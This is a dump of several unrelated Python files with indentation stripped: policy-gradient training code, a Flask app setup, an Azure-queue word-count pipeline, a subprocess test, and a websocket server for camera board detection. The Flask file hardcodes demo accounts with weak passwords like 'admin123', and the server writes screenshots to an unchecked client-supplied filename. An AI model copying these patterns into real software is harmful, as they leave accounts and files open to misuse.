# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# YOUR_CODE_HERE
q_n = []
for path in paths:
q = 0
q_path = []
# Dynamic programming over reversed path
for rew in reversed(path["reward"]):
q = rew + gamma * q
q_path.append(q)
q_path.reverse()
# Append these q values
if not reward_to_go:
q_path = [q_path[0]] * len(q_path)
q_n.extend(q_path)
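# The reverse pass above implements the recurrence Q_t = r_t + gamma * Q_{t+1} (with Q_{T+1} = 0).
# Tiny worked example with gamma = 0.5 and rewards [1, 2, 4]:
#   reward-to-go:      Q = [1 + 0.5*(2 + 0.5*4), 2 + 0.5*4, 4] = [3.0, 4.0, 4.0]
#   trajectory-based:  Q = [3.0, 3.0, 3.0]  (total discounted return repeated at every step)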
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no : ob_no})
b_n = normalize(b_n, np.mean(q_n), np.std(q_n))
# Generalized advantage estimation
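# A short note on the recurrence used below: with TD error
#   delta_t = r_t + gamma * V(s_{t+1}) - V(s_t)
# the GAE advantage is A_t = delta_t + gamma * lambda * A_{t+1} (with A_{T+1} = 0).
# The slice b_n[idx-1:None:-1] walks this path's baseline values in reverse, mirroring
# reversed(path["reward"]); zip() truncates it to the current path's length.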
adv_n = []
idx = 0
for path in paths:
adv = 0
adv_path = []
V_next = 0
idx += len(path["reward"])
# Dynamic programming over reversed path
for rew, V in zip(reversed(path["reward"]), b_n[idx-1:None:-1]):
bellman_error = rew + gamma * V_next - V
adv = bellman_error + gae_lambda * gamma * adv
adv_path.append(adv)
V_next = V
adv_path.reverse()
# Append these advantage values
if not reward_to_go:
adv_path = [adv_path[0]] * len(adv_path)
adv_n.extend(adv_path)
# Compute a GAE version of q_n to use when fitting the baseline
q_n = b_n + adv_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
adv_n = normalize(adv_n)
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
q_normalized_n = normalize(q_n)
sess.run(baseline_update_op, feed_dict={sy_ob_no : ob_no, sy_target_n : q_normalized_n})
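# Hints #bl1 and #bl2 go together: the baseline network is fit to normalized targets here,
# so at prediction time (above) its raw output is rescaled to the mean/std of the current
# batch of Q-values before being used as a baseline.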
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
sess.run(update_op, feed_dict={sy_ob_no : ob_no, sy_ac_na : ac_na, sy_adv_n : adv_n})
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--gae_lambda', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
gae_lambda=args.gae_lambda,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
__init__.py
|
import redis
from apscheduler.schedulers.blocking import BlockingScheduler
from app.common.func import *
from app.model.model import PolicyEnum
from app.conf.secret import *
app_path = os.path.dirname(os.path.realpath(__file__))
redis_pool = redis.ConnectionPool(host=redis_host, port=redis_port, db=redis_db, password=redis_password)
# Initialize a couple of demo accounts; in real use, plug in your company's internal SSO instead
users = {
'admin': {
'password': 'admin123',
'role': [PolicyEnum.MANAGE.value, PolicyEnum.ACCESS.value]
},
'normal': {
'password': 'normal123',
'role': [PolicyEnum.ACCESS.value]
},
'joyfeng': {
'password': 'joyfeng',
'role': [PolicyEnum.ACCESS.value]
},
'tezhou': {
'password': 'tezhou',
'role': [PolicyEnum.ACCESS.value]
},
'fayliu': {
'password': 'fayliu',
'role': [PolicyEnum.ACCESS.value]
},
'zoeyzhao': {
'password': 'zoeyzhao',
'role': [PolicyEnum.ACCESS.value]
},
'jameshen': {
'password': 'jameshen',
'role': [PolicyEnum.ACCESS.value]
}
}
def init():
from threading import Thread
from app.core.jobs import status_clear
# Scheduled job
scheduler = BlockingScheduler()
scheduler.add_job(status_clear, 'cron', hour=0)
Thread(target=scheduler.start, daemon=True).start()
# mongo
from mongoengine import connect
connect(
mongo_database,
username=mongo_user,
password=mongo_password,
host=mongo_host,
port=mongo_port,
connect=False
)
def create_app():
from flask import Flask
from flask_cors import CORS
from app.web import bp_api, bp_web, bp_ws
from app.core.lib import ScanThread
from app.conf.conf import cors_origin
init()
app = Flask(__name__)
app.secret_key = secret_key
CORS(bp_api, supports_credentials=True, origins=cors_origin)
CORS(bp_ws, supports_credentials=True, origins=cors_origin)
app.register_blueprint(bp_api)
app.register_blueprint(bp_web)
app.register_blueprint(bp_ws)
# jinja2 function
app.add_template_global(system_types, 'system_types')
app.add_template_global(workspace_status, 'workspace_status')
app.add_template_global(func_account, 'func_account')
app.add_template_global(is_manager, 'is_manager')
app.add_template_global(time_now, 'time_now')
app.add_template_filter(time_show, 'time_show')
app.add_template_filter(ws_roles, 'ws_roles')
app.add_template_filter(format_json, 'json_show')
app.add_template_filter(format_request, 'request_show')
app.add_template_filter(format_response, 'response_show')
app.add_template_filter(str_show, 'str_show')
app.add_template_filter(request_num, 'request_num')
# Start the scan task
ScanThread().start()
return app
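# A minimal usage sketch (assumes a standard Flask entry point; the package path is illustrative):
#
#   from app import create_app
#   app = create_app()
#   if __name__ == '__main__':
#       app.run(host='0.0.0.0', port=5000)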
|
lf_mapreduce.py
|
#!/usr/bin/env python
# encoding: utf-8
from os import listdir
from os.path import isfile, join
from azure.storage.queue import QueueService
from datetime import datetime
from common.common import *
import threading
import json
import random
import re
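# Pipeline sketch (one reading of the code below): a crawler thread pushes file contents onto
# randomly chosen data queues; mapper threads pull documents, count words and push
# (file, word, count) messages onto per-letter queues; index-writer threads drain the
# per-letter queues and write one JSON index file per leading character into the output dir.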
def connect_queue():
queue_service = QueueService(ACCOUNT_NAME, ACCOUNT_KEY)
return queue_service
def create_queue(queue_service, name):
print('Creating queue %s' % name)
queue_service.create_queue(name)
def queue_name(queue_num):
return '%s-d-%d' % (QUEUE_NAME, queue_num)
def queue_name_for_word(word):
return '%s-q-%s' % (QUEUE_NAME, word[0])
def random_queue_name(num_queues):
q = random.randint(0, num_queues-1)
return queue_name(q)
def crawler(path, num_queues):
files = files_in_dir(path)
for filename in files:
print('Crawling %s' % filename)
text = file_content(filename)
content = {'file': filename, 'text': text, 'timestamp': "%s" % datetime.now()}
queue = random_queue_name(num_queues)
queue_service.put_message(queue, json.dumps(content))
def mapper(mapper_num, queues_to_check):
for queue in queues_to_check:
check_mapper_queue(mapper_num, queue)
def check_mapper_queue(mapper_num, read_queue):
while True:
messages = queue_service.get_messages(read_queue, 32)
for message in messages:
parsed = json.loads(message.message_text)
try:
filename = parsed['file']
except KeyError:
# Malformed message: log it, drop it from the queue and move on
print(message.message_text)
queue_service.delete_message(read_queue, message.message_id, message.pop_receipt)
continue
print('Mapper %d reading from %s: %s' % (mapper_num, read_queue, filename))
wordcounts = {}
for word in words(parsed['text']):
if word in wordcounts:
wordcounts[word] += 1
else:
wordcounts[word] = 1
for word in wordcounts.keys():
write_queue = queue_name_for_word(word)
content = {'file': filename, 'word': word, 'count': wordcounts[word]}
queue_service.put_message(write_queue, json.dumps(content))
queue_service.delete_message(read_queue, message.message_id, message.pop_receipt)
if (len(messages) == 0):
break
def index_writer(path, queues_to_check):
for queue in queues_to_check:
check_index_queue(path, queue)
def check_index_queue(path, read_queue):
print('Reducer reading from %s' % (read_queue))
words = {}
while True:
messages = queue_service.get_messages(read_queue, 32)
for message in messages:
parsed = json.loads(message.message_text)
try:
filename = parsed['file']
word = parsed['word']
count = int(parsed['count'])
except (KeyError, ValueError):
# Malformed message: log it, drop it from the queue and move on
print(message.message_text)
queue_service.delete_message(read_queue, message.message_id, message.pop_receipt)
continue
content = {'wordcount': count, 'path': filename}
if word in words:
words[word].append(content)
else:
words[word] = [content]
queue_service.delete_message(read_queue, message.message_id, message.pop_receipt)
if (len(messages) == 0):
break
letter = read_queue[-1:]
filename = '%s/%s.txt' % (path, letter)
write_json(filename, words)
def write_json(filename, content):
with open(filename, 'w+') as outfile:
outfile.write(json.dumps(content))
def files_in_dir(path):
return [ join(path, f) for f in listdir(path) if isfile(join(path, f)) and f.endswith('.md') and not f.startswith('.') ]
def file_content(filename):
fh = open(filename)
return fh.read()
def words(text):
return re.sub("[^a-z0-9]", " ", text.lower()).split()
def slice(list, cols=2):
start = 0
for i in range(cols):
stop = start + len(list[i::cols])
yield list[start:stop]
start = stop
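# For example, slice([1, 2, 3, 4, 5], cols=2) yields [1, 2, 3] and then [4, 5]:
# each of the `cols` chunks gets len(list[i::cols]) consecutive elements.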
num_crawlers = 1
num_queues = 3
num_mappers = 5
num_index_writers = 7
queue_service = connect_queue()
all_queues = []
for q in range(0, num_queues):
name = queue_name(q)
create_queue(queue_service, name)
all_queues.append(name)
letter_queues = []
for l in range(ord('a'), ord('z') + 1):
name = queue_name_for_word(chr(l))
create_queue(queue_service, name)
letter_queues.append(name)
for l in range(ord('0'), ord('9') + 1):
name = queue_name_for_word(chr(l))
create_queue(queue_service, name)
letter_queues.append(name)
c = threading.Thread(target=crawler, args=('docs', num_queues))
c.start()
for m in range(0, num_mappers):
t = threading.Thread(target=mapper, args=(m, random.sample(all_queues, len(all_queues))))
t.start()
queue_slices = list(slice(letter_queues, num_index_writers))
for m in range(0, num_index_writers):
my_queues = queue_slices[m]
t = threading.Thread(target=index_writer, args=('out', random.sample(my_queues, len(my_queues))))
t.start()
|
test_square.py
|
import logging
import shlex
import threading
import unittest
import subprocess
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()
logFormatter = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(name)-4s] %(message)s")
#
def launch_client_process_and_stream(command):
args = shlex.split(command)
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
logger.info("Launched process %s " % command)
for line in process.stdout:
print(line)
class TestClient(unittest.TestCase):
def test_message_passing(self):
'''
Launches two client processes: one generates random numbers and the other squares them
'''
self.assertEqual(True,True)
print("HELLO")
logger.info("Logged hello")
source_client_command = "python ../../../core/client/client_launcher.py source_op http://127.0.0.1:10000 --operator_path ../master/generate_random_int.pickle --debug --is_first --next_op_addr http://127.0.0.1:20208"
final_client_command = "python ../../../core/client/client_launcher.py final_op http://127.0.0.1:10000 --operator_path ../master/square_op.pickle --debug --is_final --rpc_port 20208"
source_thread = threading.Thread(target=launch_client_process_and_stream, args=[source_client_command])
final_thread = threading.Thread(target=launch_client_process_and_stream, args=[final_client_command])
final_thread.start()
source_thread.start()
source_thread.join()
final_thread.join()
if __name__ == '__main__':
unittest.main()
"python ../../../core/client/client_launcher.py source_op http://127.0.0.1:10000 --operator_path ../master/generate_random_int.pickle --debug --is_first --next_op_addr http://127.0.0.1:20208"
"python ../../../core/client/client_launcher.py op1 http://127.0.0.1:10000 --rpc_port 20208 --operator_path ../master/square_op.pickle --debug --next_op_addr http://127.0.0.1:20209"
"python ../../../core/client/client_launcher.py final_op http://127.0.0.1:10000 --rpc_port 20209 --operator_path ../master/square_op.pickle --debug --is_final"
|
server.py
|
from __future__ import with_statement
import sys, traceback
import json
import time
import cv2
import globals
import base64
import numpy as np
from random import randint
from threading import Thread
from threading import Lock
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from util import misc_util
from board.markers.marker_util import *
from board.board_descriptor import BoardDescriptor
from board.board_areas.board_area import BoardArea
from board.board_areas.tiled_board_area import TiledBoardArea
from board.markers.image_marker import ImageMarker
from board.markers.haar_classifier_marker import HaarClassifierMarker
from board.markers.shape_marker import ShapeMarker
from reporters.tiled_brick_position_reporter import TiledBrickPositionReporter
from reporters.tiled_brick_moved_reporters import TiledBrickMovedToAnyOfPositionsReporter
from reporters.tiled_brick_moved_reporters import TiledBrickMovedToPositionReporter
from reporters.find_marker_reporter import FindMarkerReporter
from reporters.find_markers_reporter import FindMarkersReporter
from reporters.marker_tracker import MarkerTracker
if misc_util.module_exists("picamera"):
print("Using Raspberry Pi camera")
from camera_pi import Camera
else:
print("Using desktop camera")
from camera_desktop import Camera
class Server(WebSocket):
"""
Server which communicates with the client library.
"""
busy_lock = Lock()
reporters = {}
reporter_thread = None
markers = {}
board_areas = {}
def handleMessage(self):
"""
Handles incoming message.
"""
try:
print("Got message: %s" % self.data)
json_dict = json.loads(self.data)
if "action" in json_dict:
action = json_dict["action"]
with self.busy_lock:
result = self.handle_action(action, json_dict["payload"])
if result is not None:
self.send_message(result=result[0], action=action, payload=result[1], request_id=result[2])
except Exception, e:
print("Exception in handleMessage: %s" % str(e))
traceback.print_exc(file=sys.stdout)
def handle_action(self, action, payload):
if action == "enableDebug":
return self.enable_debug(payload)
if action == "reset":
return self.reset(payload)
if action == "resetReporters":
return self.reset_reporters(payload)
if action == "resetReporter":
return self.reset_reporter(payload)
if action == "takeScreenshot":
return self.take_screenshot(payload)
if action == "initializeBoard":
return self.initialize_board(payload)
if action == "initializeBoardArea":
return self.initialize_board_area(payload)
if action == "initializeTiledBoardArea":
return self.initialize_tiled_board_area(payload)
if action == "removeBoardArea":
return self.remove_board_area(payload)
if action == "removeBoardAreas":
return self.remove_board_areas(payload)
if action == "removeMarker":
return self.remove_marker(payload)
if action == "removeMarkers":
return self.remove_markers(payload)
if action == "reportBackWhenBrickFoundAtAnyOfPositions":
return self.report_back_when_brick_found_at_any_of_positions(payload)
if action == "reportBackWhenBrickMovedToAnyOfPositions":
return self.report_back_when_brick_moved_to_any_of_positions(payload)
if action == "reportBackWhenBrickMovedToPosition":
return self.report_back_when_brick_moved_to_position(payload)
if action == "requestBrickPosition":
return self.request_brick_position(payload)
if action == "initializeShapeMarker":
return self.initialize_shape_marker(payload)
if action == "initializeImageMarker":
return self.initialize_image_marker(payload)
if action == "initializeHaarClassifierMarker":
return self.initialize_haar_classifier_marker(payload)
if action == "requestMarkers":
return self.request_markers(payload)
if action == "reportBackWhenMarkerFound":
return self.report_back_when_marker_found(payload)
if action == "startTrackingMarker":
return self.start_tracking_marker(payload)
def initialize_video(self, resolution):
if globals.camera is not None:
return
globals.camera = Camera()
globals.camera.start(resolution)
def initialize_reporter_thread(self):
if self.reporter_thread is None:
self.reporter_thread = Thread(target=self.reporter_run, args=())
self.reporter_thread.daemon = True
self.reporter_thread.start()
def reset(self, payload):
"""
Resets the board.
requestId: (Optional) Request ID
resolution: (Optional) Camera resolution in [width, height]. Default: [640, 480].
"""
resolution = payload["resolution"] if "resolution" in payload else [640, 480]
globals.board_descriptor = BoardDescriptor()
self.reset_board_descriptor()
self.initialize_reporter_thread()
self.reset_reporters({})
self.remove_board_areas({})
self.remove_markers({})
self.initialize_video(resolution)
return "OK", {}, self.request_id_from_payload(payload)
def reset_board_descriptor(self):
"""
Resets the board descriptor with standard values.
"""
globals.board_descriptor.board_size = [1280, 800]
globals.board_descriptor.border_percentage_size = [0.0, 0.0]
def enable_debug(self, payload):
"""
Enables debug output.
requestId: (Optional) Request ID
"""
globals.debug = True
return "OK", {}, self.request_id_from_payload(payload)
def take_screenshot(self, payload):
"""
Take a screenshot and saves it to disk.
requestId: (Optional) Request ID
filename: (Optional) Screenshot filename
"""
image = globals.camera.read()
if image is not None:
filename = "debug/board_{0}.png".format(time.strftime("%Y-%m-%d-%H%M%S"))\
if "filename" not in payload else payload["filename"]
cv2.imwrite(filename, image)
return "OK", {}, self.request_id_from_payload(payload)
else:
return "CAMERA_NOT_READY", {}, self.request_id_from_payload(payload)
def initialize_board(self, payload):
"""
Initializes board with given parameters.
requestId: (Optional) Request ID
borderPercentage: (Optional) Border [width, height] in percentage of board size.
cornerMarker: (Optional) Corner marker
"""
globals.board_descriptor = BoardDescriptor()
self.reset_board_descriptor()
globals.board_descriptor.border_percentage_size = [
payload["borderPercentage"][0] if "borderPercentage" in payload else 0.0,
payload["borderPercentage"][1] if "borderPercentage" in payload else 0.0
]
globals.board_descriptor.corner_marker = create_marker_from_name(payload["cornerMarker"], marker_id=-1) if "cornerMarker" in payload else DefaultMarker(marker_id=-1)
return "OK", {}, self.request_id_from_payload(payload)
def initialize_board_area(self, payload):
"""
Initializes board area with given parameters.
requestId: (Optional) Request ID
id: (Optional) Area id
x1: X1 in percentage of board size.
y1: Y1 in percentage of board size.
x2: X2 in percentage of board size.
y2: Y2 in percentage of board size.
"""
board_area = BoardArea(
payload["id"] if "id" in payload else None,
[payload["x1"], payload["y1"], payload["x2"], payload["y2"]],
globals.board_descriptor
)
self.board_areas[board_area.area_id] = board_area
return "OK", {"id": board_area.area_id}, self.request_id_from_payload(payload)
def initialize_tiled_board_area(self, payload):
"""
Initializes tiled board area with given parameters.
requestId: (Optional) Request ID
id: (Optional) Area id
tileCountX: Number of horizontal tiles.
tileCountY: Number of vertical tiles.
x1: X1 in percentage of board size.
y1: Y1 in percentage of board size.
x2: X2 in percentage of board size.
y2: Y2 in percentage of board size.
"""
board_area = TiledBoardArea(
payload["id"] if "id" in payload else None,
[payload["tileCountX"], payload["tileCountY"]],
[payload["x1"], payload["y1"], payload["x2"], payload["y2"]],
globals.board_descriptor
)
self.board_areas[board_area.area_id] = board_area
return "OK", {"id": board_area.area_id}, self.request_id_from_payload(payload)
def remove_board_areas(self, payload):
"""
Removes all board areas.
requestId: (Optional) Request ID
"""
self.board_areas = {}
return "OK", {}, self.request_id_from_payload(payload)
def remove_board_area(self, payload):
"""
Removes the given board area.
requestId: (Optional) Request ID
id: Area ID.
"""
area_id = payload["id"]
del self.board_areas[area_id]
return "OK", {}, self.request_id_from_payload(payload)
def remove_markers(self, payload):
"""
Removes all markers.
requestId: (Optional) Request ID
"""
self.markers = {}
return "OK", {}, self.request_id_from_payload(payload)
def remove_marker(self, payload):
"""
Removes the given marker.
requestId: (Optional) Request ID
id: Marker ID.
"""
marker_id = payload["id"]
del self.markers[marker_id]
return "OK", {}, self.request_id_from_payload(payload)
def report_back_when_brick_found_at_any_of_positions(self, payload):
"""
Reports back when object is found in any of the given positions.
requestId: (Optional) Request ID
areaId: Board area id
validPositions: Positions to search for object in.
stabilityLevel: (Optional) Minimum board area stability level before searching for object
id: (Optional) Reporter id.
"""
board_area = self.board_areas[payload["areaId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
valid_positions = payload["validPositions"]
stability_level = payload["stabilityLevel"] if "stabilityLevel" in payload else 0.98
reporter = TiledBrickPositionReporter(
board_area,
valid_positions,
stability_level,
reporter_id,
callback_function=lambda tile: self.send_message(result="UPDATE",
action="brickFoundAtPosition",
payload={"id": reporter_id, "position": tile},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def report_back_when_brick_moved_to_any_of_positions(self, payload):
"""
Reports back when object is found in any of the given positions other than the initial position.
requestId: (Optional) Request ID
areaId: Board area id
initialPosition: Initial position.
validPositions: Positions to search for object in.
stabilityLevel: (Optional) Minimum board area stability level before searching for object
id: (Optional) Reporter id.
"""
board_area = self.board_areas[payload["areaId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
initial_position = payload["initialPosition"]
valid_positions = payload["validPositions"]
stability_level = payload["stabilityLevel"] if "stabilityLevel" in payload else 0.98
reporter = TiledBrickMovedToAnyOfPositionsReporter(
board_area,
initial_position,
valid_positions,
stability_level,
reporter_id,
callback_function=lambda tile: self.send_message(result="UPDATE",
action="brickMovedToPosition",
payload={"id": reporter_id, "position": tile, "initialPosition": initial_position},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def report_back_when_brick_moved_to_position(self, payload):
"""
Reports back when object is found at the given position.
requestId: (Optional) Request ID
areaId: Board area id
position: Position for brick to be found
validPositions: Positions to search for object in
stabilityLevel: (Optional) Minimum board area stability level before searching for object
id: (Optional) Reporter id
"""
board_area = self.board_areas[payload["areaId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
position = payload["position"]
valid_positions = payload["validPositions"]
stability_level = payload["stabilityLevel"] if "stabilityLevel" in payload else 0.98
reporter = TiledBrickMovedToPositionReporter(
board_area,
position,
valid_positions,
stability_level,
reporter_id,
callback_function=lambda tile: self.send_message(result="UPDATE",
action="brickMovedToPosition",
payload={"id": reporter_id, "position": tile},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def request_brick_position(self, payload):
"""
Returns object position from given positions.
requestId: (Optional) Request ID
areaId: Board area id
validPositions: Positions to search for object in
"""
image = self.take_photo()
if image is None:
return "CAMERA_NOT_READY", {}
globals.board_descriptor.snapshot = globals.board_recognizer.find_board(image, globals.board_descriptor)
if globals.board_descriptor.is_recognized():
board_area = self.board_areas[payload["areaId"]]
valid_positions = payload["validPositions"]
position = globals.brick_detector.find_brick_among_tiles(board_area, valid_positions)[0]
if position is not None:
return "OK", {"position": position}, self.request_id_from_payload(payload)
else:
return "BRICK_NOT_FOUND", {}, self.request_id_from_payload(payload)
else:
return "BOARD_NOT_RECOGNIZED", {}, self.request_id_from_payload(payload)
def initialize_image_marker(self, payload):
"""
Initializes image marker with given parameters.
requestId: (Optional) Request ID
markerId: Marker id
imageBase64: Image as base 64 encoded PNG
minMatches: (Optional) Minimum number of required matches
"""
raw_image = base64.b64decode(payload["imageBase64"])
raw_bytes = np.asarray(bytearray(raw_image), dtype=np.uint8)
image = cv2.imdecode(raw_bytes, cv2.CV_LOAD_IMAGE_UNCHANGED)
marker_id = payload["markerId"]
min_matches = payload["minMatches"] if "minMatches" in payload else 8
image_marker = ImageMarker(marker_id, image, min_matches=min_matches)
self.markers[marker_id] = image_marker
return "OK", {"id": marker_id}, self.request_id_from_payload(payload)
def initialize_haar_classifier_marker(self, payload):
"""
Initializes haar classifier marker with given parameters.
requestId: (Optional) Request ID
markerId: Marker id
dataBase64: Base 64 encoded Haar Cascade Classifier data
"""
cascade_data = base64.b64decode(payload["dataBase64"])
marker_id = payload["markerId"]
haar_classifier_marker = HaarClassifierMarker(marker_id, cascade_data)
self.markers[marker_id] = haar_classifier_marker
return "OK", {"id": marker_id}, self.request_id_from_payload(payload)
def initialize_shape_marker(self, payload):
"""
Initializes a shape marker with given image and parameters.
requestId: (Optional) Request ID
markerId: Marker id
shape: (Optional) Shape
imageBase64: (Optional) Image as base 64 encoded PNG
minArea: (Optional) Minimum area in percent of destination image
maxArea: (Optional) Maximum area in percent of destination image
"""
marker_id = payload["markerId"]
if "shape" in payload:
contour = np.int32(payload["shape"]).reshape(-1, 1, 2)
shape_marker = ShapeMarker(marker_id,
contour=contour,
min_area=payload["minArea"] if "minArea" in payload else 0.0025,
max_area=payload["maxArea"] if "maxArea" in payload else 0.9)
else:
raw_image = base64.b64decode(payload["imageBase64"])
raw_bytes = np.asarray(bytearray(raw_image), dtype=np.uint8)
image = cv2.imdecode(raw_bytes, cv2.CV_LOAD_IMAGE_UNCHANGED)
shape_marker = ShapeMarker(marker_id,
marker_image=image,
min_area=payload["minArea"] if "minArea" in payload else 0.0025,
max_area=payload["maxArea"] if "maxArea" in payload else 0.9)
self.markers[marker_id] = shape_marker
return "OK", {"id": marker_id}, self.request_id_from_payload(payload)
def report_back_when_marker_found(self, payload):
"""
Reports back when marker is found.
requestId: (Optional) Request ID
areaId: Board area id
markerId: Marker id
stabilityLevel: (Optional) Minimum board area stability level before searching for marker
id: (Optional) Reporter id
"""
board_area = self.board_areas[payload["areaId"]]
marker = self.markers[payload["markerId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
stability_level = payload["stability_level"] if "stability_level" in payload else 0.98
reporter = FindMarkerReporter(
board_area,
marker,
stability_level,
reporter_id,
callback_function=lambda (marker): self.send_message(result="UPDATE",
action="markerFound",
payload={"id": reporter_id,
"areaId": payload["areaId"],
"marker": filter_out_contour_from_marker_result(marker)},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def request_markers(self, payload):
"""
Searches for the specified markers in given area.
requestId: (Optional) Request ID
areaId: Board area id
markerIds: List of marker id's
stabilityLevel: (Optional) Minimum board area stability level before searching for markers
id: (Optional) Reporter id
"""
board_area = self.board_areas[payload["areaId"]]
markers = [self.markers[marker_id] for marker_id in payload["markerIds"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
stability_level = payload["stabilityLevel"] if "stabilityLevel" in payload else 0.0
reporter = FindMarkersReporter(
board_area,
markers,
stability_level,
reporter_id,
callback_function=lambda (result): self.send_message(result="UPDATE",
action="markersFound",
payload={"id": reporter_id,
"areaId": payload["areaId"],
"markers": filter_out_contour_from_marker_result_list(result)},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def start_tracking_marker(self, payload):
"""
Starts tracking marker.
requestId: (Optional) Request ID
areaId: Board area id
markerId: Marker id
id: (Optional) Reporter id
"""
board_area = self.board_areas[payload["areaId"]]
marker = self.markers[payload["markerId"]]
reporter_id = payload["id"] if "id" in payload else self.random_id()
reporter = MarkerTracker(
board_area,
marker,
reporter_id,
callback_function=lambda (marker): self.send_message(result="UPDATE",
action="markerTracked",
payload={"id": reporter_id,
"areaId": payload["areaId"],
"marker": filter_out_contour_from_marker_result(marker)},
request_id=self.request_id_from_payload(payload)))
self.reporters[reporter_id] = reporter
return "OK", {"id": reporter_id}, None
def reset_reporters(self, payload):
"""
Stops and resets all reporters.
requestId: (Optional) Request ID
"""
for (_, reporter) in self.reporters.iteritems():
reporter.stop()
return "OK", {}, self.request_id_from_payload(payload)
def reset_reporter(self, payload):
"""
Stops and resets the reporter with given ID.
requestId: (Optional) Request ID
id: Reporter ID.
"""
reporter_id = payload["id"]
self.reporters[reporter_id].stop()
return "OK", {}, self.request_id_from_payload(payload)
def take_photo(self):
"""
Returns the most recent photo from the camera.
"""
